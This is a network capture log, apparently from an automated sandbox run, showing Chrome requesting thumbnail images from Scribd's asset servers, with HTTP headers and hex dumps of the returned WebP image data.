                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 57
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 56546
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-kigq8000041-CHI, cache-ewr-kewr1740075-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 38, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522380.608345,VS0,VE2
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1378INData Raw: 52 49 46 46 2e 12 00 00 57 45 42 50 56 50 38 20 22 12 00 00 30 4a 00 9d 01 2a 95 00 c6 00 3e 6d 2e 94 47 24 22 22 21 27 b5 2c e8 80 0d 89 64 00 d4 12 0b fe f1 d7 6b 29 fa 9b f2 df 8e de d4 9c d7 de 17 a9 b5 00 b3 33 b4 32 93 e8 df f5 9f d9 3f 27 3e 6e 7a 48 fd 07 ec 13 fa 7d fe d3 ab 37 ee 2f a8 cf d7 7f dc bf 77 7f f6 df b2 1e e9 3f b1 fa 80 7f 63 ff 41 eb 65 ff 33 d9 0f fb 77 fb bf 60 cf d7 7f 4c bf dd 2f 84 bf ec bf f3 ff 6f 7d a8 ff fc 6b 59 79 03 b1 ff f5 5e 16 f9 75 f9 e4 95 5c 00 d4 a7 b6 fc 60 ef 9f e4 76 a1 6e eb e5 5f fc cf 50 8f 69 3e 99 ff 1b c3 4f 52 cf 00 7b 00 79 39 ff 1b c3 ef d2 bd 81 7f a4 7f 92 fd 86 f6 63 cf bf d8 3e c1 bd 27 3d 1b ff 6c 50 37 73 5a eb 8d 1a e1 19 fb 0a d7 9c 7d 96 49 2b bf 28 5e e4 ec b1 0f c0 38 c0 3f fb 26 a4 c2 81
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: RIFF.WEBPVP8 "0J*>m.G$""!',dk)32?'>nzH}7/w?cAe3w`L/o}kYy^u\`vn_Pi>OR{y9c>'=lP7sZ}I+(^8?&
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1378INData Raw: 1e 84 20 a9 f8 34 67 68 b2 c0 11 55 18 ee 8a 3a a4 c7 d1 b6 08 03 9d 00 8a 94 a8 b9 34 e9 2a d2 65 7a c4 cd bb 6a af 27 2d c8 74 dd 48 e1 19 b9 cb 36 88 5d f7 ee b8 36 f3 b9 18 76 85 2f b1 76 3a f3 c4 6b e1 68 7c 51 5d b3 08 46 84 41 05 41 f9 48 79 5d 4a f3 65 03 c4 ae 10 b8 97 4d e5 9f 4f 2b ab 4d 83 85 e9 50 8c 95 4f fb eb 69 55 ba df bc 52 5c d8 54 a7 a9 38 fb 4b bb 4b 40 f7 f0 ca 0a b9 a1 cb 54 ba 18 f2 fe ea fe 2f db f3 2d 8c c1 cf 0e 93 a0 88 ab 34 52 ba 53 39 54 96 91 66 2e 63 24 23 0a d5 af 2f 1e 7e 79 2f 3a fc 7b 3f 0d 13 6f 1e d6 74 77 55 7c f7 2c 0c df fc 26 68 9d d2 85 93 bb 79 0b 25 df 77 1f 64 f1 cd 47 1f ba 50 37 e2 1f 5a 7c c3 53 98 74 60 7b 72 bf 6d 38 5f 33 90 20 44 c3 17 ac fe f0 0e 57 53 af 69 cc 6d 95 15 b5 90 7a 01 e1 48 db b4 26 6f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 4ghU:4*ezj'-tH6]6v/v:kh|Q]FAAHy]JeMO+MPOiUR\T8KK@T/-4RS9Tf.c$#/~y/:{?otwU|,&hy%wdGP7Z|St`{rm8_3 DWSimzH&o
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1378INData Raw: 37 33 c1 fb 93 06 5f ee b5 b1 3a fc 84 27 56 39 3c ff 0b 8f 58 7b 65 ed c2 82 44 0f e6 70 18 40 fb ec fb 19 45 9f c8 d0 a4 1b dc a8 69 4f e6 41 bb 5a 9f cc 48 2c 8b df 7b 1b 37 0c 75 3f 04 7d a0 ee 03 de ce 75 30 fc dd 8f 1a 57 c9 7a 2d 2a da bb 59 2b 5a c4 2e 94 50 2b fd fb 29 f6 a2 47 77 9c 85 3c a2 6d 81 8a d7 52 7c 31 e3 f9 1b b6 5c e2 a3 f5 6a e8 ca 25 80 be 5e 4b bb 9d 2b 9f 82 68 5a 27 82 d0 0a d9 99 f3 68 31 66 e7 62 b7 bf a9 f3 37 f2 da 42 21 82 2d 5d 31 7b 4f f1 0d 45 2b 14 7e 9c dd 77 81 d5 97 cb ac 67 7e 1d c1 f3 0c 50 67 8f a5 f0 b9 cb bc 19 d4 46 47 6f d7 fc 44 6b 58 a0 3f 0e 14 10 82 5d 03 e1 06 e0 82 1a 82 80 9c 1a 27 18 1a cc 11 4c 6e c7 91 9e 2f 62 04 31 9e 56 e0 03 6b 5d 5b 18 73 54 4c 6c 4a d3 67 fb 6e ec aa a8 c2 01 9e 22 f9 08 cc 24
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 73_:'V9<X{eDp@EiOAZH,{7u?}u0Wz-*Y+Z.P+)Gw<mR|1\j%^K+hZ'h1fb7B!-]1{OE+~wg~PgFGoDkX?]'Ln/b1Vk][sTLlJgn"$
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC528INData Raw: 73 f9 dd a7 fa 2c 97 03 25 c4 42 4e f7 66 b8 06 b3 3e 9f dd 8d 79 7b 44 c0 31 c7 8e 7c 64 ca 8c 6c fd a8 8a ed 9e 1b 62 74 82 5a c4 b6 83 5f d8 0a 50 e0 f3 56 4f ff 29 dc cc 40 38 c4 82 8c 30 7f 1d 3e 5f 3e 55 c6 fb 56 b3 fa 73 5a ee 8d 5e db d2 62 5e 34 5b e8 fa 72 ab ef 17 b0 a8 fc c1 dc 56 41 04 ab 55 db 6c c3 3f 12 5f 0e d5 ee 7f 1e a7 57 a8 f7 70 2e b4 c7 b5 76 ae 4b c1 27 08 b6 f2 eb 4f 05 61 a0 fe 84 00 3f 0b 3d 9b 5c ac 22 7b cf dc e3 be c5 1c 90 af d5 cc 9a fd d4 f1 d0 7e 63 9a d7 27 6a 16 dd c7 3a ad d5 c5 e0 5f 2b 31 63 89 33 d2 9b ea 90 02 cf 14 44 ad 5e 8f c6 40 e2 fc cf 02 ee b4 2f 85 f9 75 9d 84 8d 45 47 98 d1 b5 69 e8 ba 07 18 55 48 9d f2 c3 00 91 26 65 b4 9b 98 2c 2b ed 2d be 20 61 00 74 e3 2a 57 b7 1a 44 2d 94 01 55 54 34 44 4d 94 c3 84
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: s,%BNf>y{D1|dlbtZ_PVO)@80>_>UVsZ^b^4[rVAUl?_Wp.vK'Oa?=\"{~c'j:_+1c3D^@/uEGiUH&e,+- at*WD-UT4DM


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        107192.168.2.1649848151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC645OUTGET /img/word_document/211302755/149x198/e130bab094/1733400677?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-2-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC777INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 6666
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "+kaAqkBvjQnfjDsWc5iaJWspDS1cbEpsjeY7h8S4QkM"
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Info: ifsz=16048 idim=149x198 ifmt=png ofsz=6666 odim=149x198 ofmt=webp
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Served-By: vpop-kiad7010227
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Stats: io=1
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 70
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Age: 121701
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-kigq8000112-CHI, cache-ewr-kewr1740032-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 68, 1
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522380.609447,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1378INData Raw: 52 49 46 46 02 1a 00 00 57 45 42 50 56 50 38 20 f6 19 00 00 90 5a 00 9d 01 2a 95 00 c6 00 3e 6d 2e 93 46 24 22 a1 a1 2d 97 4b 68 80 0d 89 6c 00 d6 69 c0 e0 3e 46 fe 13 cc 9e ba fd eb f1 bf f7 1f 74 1d 36 f4 a7 93 47 96 7e c1 ff 63 fc 77 b5 9f f1 fe a4 3f 3b 7f da f7 02 fd 5d fd 74 f5 d0 fd 72 f7 0f fb 77 ea 13 f6 83 f6 d3 dd 17 fd 07 ee 17 b8 df ea df e6 7f 64 7e 01 ff ae ff 87 ff ff ec f7 ea 57 fd b3 fe 97 ff ff 71 2f dc 4f ff fe bc 3f bb df 0a 1f de bf e9 7e eb fb 63 ff ff f6 00 ff ff ed e5 d2 9f d4 bf ef 1d ac ff 93 fc 98 f3 a7 c5 57 b1 3d c0 fe d1 ee 25 8a 3e b7 f3 65 f7 2f f6 3f da 7d 02 ff 33 f9 81 fd bb d1 bf 8a ba 84 7b 3b fd de f6 3d ad f4 08 f6 ab eb 5f f1 3c 2b ff da f4 2f ec 07 fd af 70 0f e7 7f d3 ff e9 fa c3 ff 3f c4 5f ed 5f f5 3d 81 3f 97
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: RIFFWEBPVP8 Z*>m.F$"-Khli>Ft6G~cw?;]trwd~Wq/O?~cW=%>e/?}3{;=_<+/p?__=?
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1378INData Raw: 1b 7a 8d 19 59 ad 2d d6 72 8e 64 88 3f 81 aa ff 22 c1 e5 50 09 da a5 70 81 74 d7 cf 81 48 d6 69 e4 bb 68 fd d7 17 57 29 02 20 ee a6 37 e9 9c e5 e1 94 2f 09 1b da 29 82 72 97 dd 1e a4 a7 6f 6c 6c 52 f3 5e ae c2 04 96 58 30 2f 49 f7 87 11 3e 11 5c 30 10 13 06 3b 79 95 f3 26 2e 05 fc 48 4a e3 32 20 8d 7e 80 73 45 d6 72 cb e9 4b bf 9d 80 05 b9 b9 05 9f 93 de e7 30 70 67 a3 40 53 73 b5 11 b2 0c a8 98 c1 2b 89 8a 07 e1 fb c8 56 20 43 b3 1f 45 d0 62 a4 5b 66 54 bd fd 09 fc 85 bd 58 4c bf 15 18 44 04 2b 6b 16 aa 7e 94 f1 4b 6a 30 24 d6 02 56 f0 b4 a4 83 18 5a 75 12 49 a7 8b 50 86 28 f6 9c a0 5c e8 49 82 4c d7 0b 2f ea de 7e ac b2 6b f9 16 08 db 75 ed de df 9e 6c 52 27 95 3b 9d be d8 e0 4a dc 57 60 4b 33 f9 c5 e1 af 8e ee 67 e8 0d 39 6a ee 59 eb fc 6b 45 73 1f 83
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: zY-rd?"PptHihW) 7/)rollR^X0/I>\0;y&.HJ2 ~sErK0pg@Ss+V CEb[fTXLD+k~Kj0$VZuIP(\IL/~kulR';JW`K3g9jYkEs
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1378INData Raw: 76 39 ae 97 3b 69 68 f7 c8 a7 56 9c f4 9f 02 65 10 59 eb 0f cf 9d ed 49 5f 71 b4 22 0c 15 8f fe 8f 66 0f 66 fb d8 b2 8e ea ac 76 fe 68 6a e7 cd b3 73 4b be b4 c1 b1 c0 ee 0c aa 8c be 78 d6 f9 3e 11 a7 1b 67 8b 2c d1 20 40 89 e4 1b 6e e5 69 37 d7 21 b5 68 a8 49 b6 73 92 70 23 74 fb fb 6a a6 35 5f fe 54 1f 13 d4 ec ac 5a 25 f2 50 30 b4 fb 4f 29 2e 94 d4 26 9e b0 e4 3d fc d2 de b7 54 ec 79 fd d5 f2 90 50 6d 23 ac 56 c5 e8 45 59 6d 89 07 3e 89 65 18 dd 65 e8 83 d6 0b d9 a3 8d bc 96 b4 74 ca be 43 4d 15 c2 f5 f4 f9 ee 72 ee 3c 10 d6 f4 85 2d 9c 8a d8 8f 67 17 33 a6 e6 79 9e 72 35 fe 64 23 e0 91 c2 c9 a4 e3 cd 8c 51 3d a2 bb 2c 5f 28 28 dc 96 bf c3 f7 e8 cb 66 1b ab 4c 79 53 d3 d0 ad 94 53 34 53 4f 89 44 bb 3b 75 ce ce 24 4b 4a 75 4a af db ad 6d 44 06 d5 a5 dc
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: v9;ihVeYI_q"ffvhjsKx>g, @ni7!hIsp#tj5_TZ%P0O).&=TyPm#VEYm>eetCMr<-g3yr5d#Q=,_((fLySS4SOD;u$KJuJmD
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1378INData Raw: 81 b8 bf c8 c1 f1 7a e6 15 76 5e 0a 2d f4 c4 1d b8 29 fc d3 8c d2 33 4a b3 54 82 cd 6e 6e da 20 9e a5 67 5d 72 07 29 86 1c 99 b6 27 00 a0 4e 2c 7d c7 55 75 9e c1 f9 5c ec 49 86 f2 db a0 bd 67 16 21 d1 dc 4f 03 4f 35 70 72 fe 08 ec 53 12 85 9b b4 8a d8 58 8c fd 35 93 9d 17 85 1c 28 de 80 2c 88 8b 71 cf 0e 84 a3 b5 be 51 6c f0 e4 e7 a3 01 64 63 01 5d 72 c1 71 eb a1 a0 5b 4f de f4 6a 17 1c 5d b6 d7 f2 26 24 a2 0a c4 a8 0e fc 73 ca 58 fd ce 3a 19 b1 02 69 87 9b c5 36 29 a1 b1 a2 9b 48 94 1e e6 de e6 e9 38 31 0a 05 68 9a ef f2 b4 97 ed e0 23 11 0c 61 1f ad c3 9a c0 94 2b 5c d6 d6 16 e2 5a a7 0e 24 97 92 05 31 31 75 5e 4f cc 8e aa e0 c9 c3 af b6 b3 b4 34 c5 c2 d1 2b c2 6e 9e b9 93 1f ec ab 58 70 49 b0 bd bf a6 8a 76 96 cb a2 d3 43 49 50 dc 03 c9 43 7e 72 fa ca
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: zv^-)3JTnn g]r)'N,}Uu\Ig!OO5prSX5(,qQldc]rq[Oj]&$sX:i6)H81h#a+\Z$11u^O4+nXpIvCIPC~r
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1154INData Raw: 42 5e 40 23 52 44 69 49 5b b0 ed fb 4d 63 f9 d4 ec fe 5b 24 5a c2 01 2e c8 26 65 10 0b b1 4d ed 25 bb 8c 0d 5a 40 0b b6 34 c7 88 a0 89 a8 cb 1f bd 77 e3 05 fd d8 08 13 5f 4c fd c7 9d f7 7c cf e9 d7 43 14 75 58 8d 3c ba 3e 51 da af be 48 3d c5 df f7 92 51 83 fb 3f 2a f5 ad 76 8d fc de c8 3d 14 dc dc f8 17 bb 50 ca b0 0f 14 1a c3 d2 99 d9 9a a2 84 ad d8 33 66 61 fd 89 2f da 95 1c 4c 7b ff 83 28 95 57 2d 7b 49 39 61 1a a1 07 8c 2d 38 05 8c 94 4b 33 1e 2f 8f 00 1a 08 76 bb 13 75 b2 89 5e 56 61 97 9f 99 6a fe 6d 1b 81 f4 da 0f b1 3a 70 a0 ff 62 a8 d9 bf 73 0a 9f 0b 08 c9 5a e8 2c de 0e e6 de 98 38 c4 c7 6f eb 50 07 ce 66 b1 aa b5 aa e6 df 11 67 48 91 63 e3 b4 c7 c2 eb 10 3a 21 f8 44 bf 12 a1 d1 d0 f5 5a 40 4c 0f 37 83 40 8b bd d6 9f a5 ad 6b 5b 87 46 c2 e5 14
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: B^@#RDiI[Mc[$Z.&eM%Z@4w_L|CuX<>QH=Q?*v=P3fa/L{(W-{I9a-8K3/vu^Vajm:pbsZ,8oPfgHc:!DZ@L7@k[F


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        108192.168.2.1649849151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC645OUTGET /img/word_document/263504218/149x198/5791495c90/1733362199?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-1-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC778INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 8406
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "O4ty3fbCG0SMYRyiRK2VvWp6G/OAnhArj+6nzHx30YY"
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Info: ifsz=20840 idim=149x198 ifmt=png ofsz=8406 odim=149x198 ofmt=webp
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Served-By: vpop-kiad7010248
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Stats: io=1
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 134
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Age: 160177
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-klot8100062-CHI, cache-ewr-kewr1740074-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 23, 1
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522380.626040,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1378INData Raw: 52 49 46 46 ce 20 00 00 57 45 42 50 56 50 38 20 c2 20 00 00 10 72 00 9d 01 2a 95 00 c6 00 3e 6d 2c 90 46 24 22 21 a1 2f d4 8d 90 80 0d 89 40 1a 11 ca 4f e2 ba d1 e5 5f 62 7f 23 a0 38 84 af 8d ee ec c4 fe 0f be 3f fb 0f 57 7b 71 7f 75 3d 43 fe d7 fa c2 fa 4d e8 ae f5 3e fd d6 f6 0e fd aa eb 65 ff 2f e9 7b 96 d3 da c7 f6 df 09 7c 7f 7b 4f dc cf ef fe df 59 4b ec 93 fc df c9 9f 73 7f 97 fd ec fd 77 f7 ff dc cf cd 8f 8e 3f ef 78 73 f1 cf fc df 50 ef ca bf 9e 7f b0 fe e7 f4 e1 ee ab b8 c2 d4 fa 07 7b bb f7 0f f8 bf e2 fc 78 bf db ff 11 ea df d7 ff f9 fe e0 3f ce 7f a8 ff b2 fc c6 f8 cb fd e7 8b cf e0 bf dd fe d3 7c 01 ff 34 fe d3 ff 5b fb f7 f9 cf d9 9f a7 0f ef 3f f6 7f ac fc be f7 25 f5 67 fe cf f6 3f 01 bf d0 bf bf ff db f5 e3 f6 3f fb c3 ec d3 fb 9c 4c 47
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: RIFF WEBPVP8 r*>m,F$"!/@O_b#8?W{qu=CM>e/{|{OYKsw?xsP{x?|4[?%g??LG
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1378INData Raw: c7 ff e8 c6 e9 24 f0 b9 e3 dc 55 3d d7 96 9e 2e 2a 01 3e 7b 95 be cc 31 f3 ab 74 b0 a3 3c 45 2b 33 81 6c 5e 5d 35 74 db 55 e9 34 29 34 cc f2 8a b9 9b c9 a2 2b 82 c4 89 23 e2 58 50 8f 1f 71 c1 80 ac 16 e0 a9 b3 a4 60 bc 37 c3 79 70 d9 30 9f f1 62 05 49 01 cc a2 85 b6 ca b1 6f 54 39 65 80 45 ab 5c bb 0b af e4 9a 40 bf c9 15 8b 52 f7 4f e6 25 d0 a3 71 b7 49 82 9f 68 53 5d 5e 44 b6 1e f9 cd 85 05 a9 6b 42 14 df 30 e3 02 e5 97 b8 f4 40 f7 6a 38 1b 16 a4 c7 f5 e8 4d ea 10 da 59 ad 48 6e 20 79 be 20 cb b5 2d 54 37 aa 50 be 26 af 3c 9a 39 2b 87 2e 32 26 63 ca 6a cf 56 e2 c4 c5 e8 85 75 3e b9 30 6a 44 31 8a 27 68 b6 ef 1e 04 27 bc 52 97 36 a1 b3 06 f8 c0 38 d4 de 18 e2 89 c5 3f 57 fe ee c1 fc 8a 6e fd 3f b0 27 cd 78 a1 27 5a 8c 28 db 51 d5 eb 3c 10 7e a8 15 11 ff
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: $U=.*>{1t<E+3l^]5tU4)4+#XPq`7yp0bIoT9eE\@RO%qIhS]^DkB0@j8MYHn y -T7P&<9+.2&cjVu>0jD1'h'R68?Wn?'x'Z(Q<~
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1378INData Raw: 8b e9 7c 49 27 6f 5b 64 a2 f5 cd 90 c4 c5 cd 90 18 20 e3 a7 7e b3 72 51 b0 db df d4 60 bd fa 7b a9 fe 4f ef b3 7d f5 f4 97 8c be d3 87 ca 33 4f de 82 38 16 19 f4 64 c8 91 03 81 5a 8c 46 cc d8 80 02 a0 3b c4 2f 29 d4 b1 91 08 df 23 90 9d 5c 08 0f a4 01 ac c3 6c cb 80 8d 0c da 71 c9 95 71 b7 e2 ad 26 cf 09 49 e2 03 e7 fb 83 3a 9b 63 8f fb 0d 4d 8b a8 2c 21 62 b8 b4 bb fb 46 e1 ed 9d 9d 42 8a 2e 9f d1 86 20 1f 94 e8 61 5d 1e 76 23 58 f4 20 08 e8 c4 6b 79 d4 9b 1d 01 77 42 f8 37 13 d6 ea 57 16 7b c3 eb 1f 4c 1e 1d 8c 43 a0 29 06 2c 3b ba 32 eb ec 92 ef f4 da 9b eb f5 ab b2 ff 2b f1 15 fb 51 43 15 97 08 8d c6 fe 8f 97 bc 7b 5c f6 fc ee 96 e3 17 65 ba ea 2a 14 b5 39 d1 98 7b 23 4c bb a1 bf 37 18 0d f4 33 a2 18 e8 74 a7 5c 5d 4e a3 bd fa 96 4c a7 8e 6e 6c fe 54
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: |I'o[d ~rQ`{O}3O8dZF;/)#\lqq&I:cM,!bFB. a]v#X kywB7W{LC),;2+QC{\e*9{#L73t\]NLnlT
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1378INData Raw: 36 c8 1c c8 36 ad 3b 33 96 64 30 b8 46 f1 6c b2 8d 4e 25 3b 76 05 36 b9 50 72 4a b6 55 b3 c5 a6 b6 c9 e0 0f f9 b6 d7 08 ba 6e 45 72 1d 6d d3 a3 27 23 cd b1 8d 32 b3 cd 33 af ac eb 1c de 0f 27 84 ea 7c b6 12 26 65 77 73 b7 1f ec 43 34 3a c8 6a 7f f6 42 35 bc 5d 39 f3 f2 b8 9d 04 b8 2e 5f 91 15 dc 56 cb 32 cf 0e 64 fc fd 88 5a e5 83 a1 40 df b9 81 0b f1 8a af 73 53 24 c4 67 cc 09 07 43 6e 59 be 9e ef 06 56 6a 5c 11 4e cc 85 80 48 31 6d 62 84 14 de 56 d4 57 fb e2 82 c1 d6 e0 4f f9 b5 e8 3e 66 59 f7 6a 53 29 e5 57 71 9b 07 88 1c 36 f6 50 f6 be 4d 34 8c b2 8d cf f0 7f 36 1a a6 64 93 26 9e f6 6d f6 10 d6 3c 9f cd cb c2 1d 6f 8e e1 5b 33 9f 49 c5 67 69 aa 08 09 b8 b4 a9 4c 30 3c 8e 29 13 b3 b6 9c e9 db 0b 94 75 f5 d9 4e 28 3d 3d f2 cf eb 4c 86 55 6f 7c 08 b4 10
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 66;3d0FlN%;v6PrJUnErm'#23'|&ewsC4:jB5]9._V2dZ@sS$gCnYVj\NH1mbVWO>fYjS)Wq6PM46d&m<o[3IgiL0<)uN(==LUo|
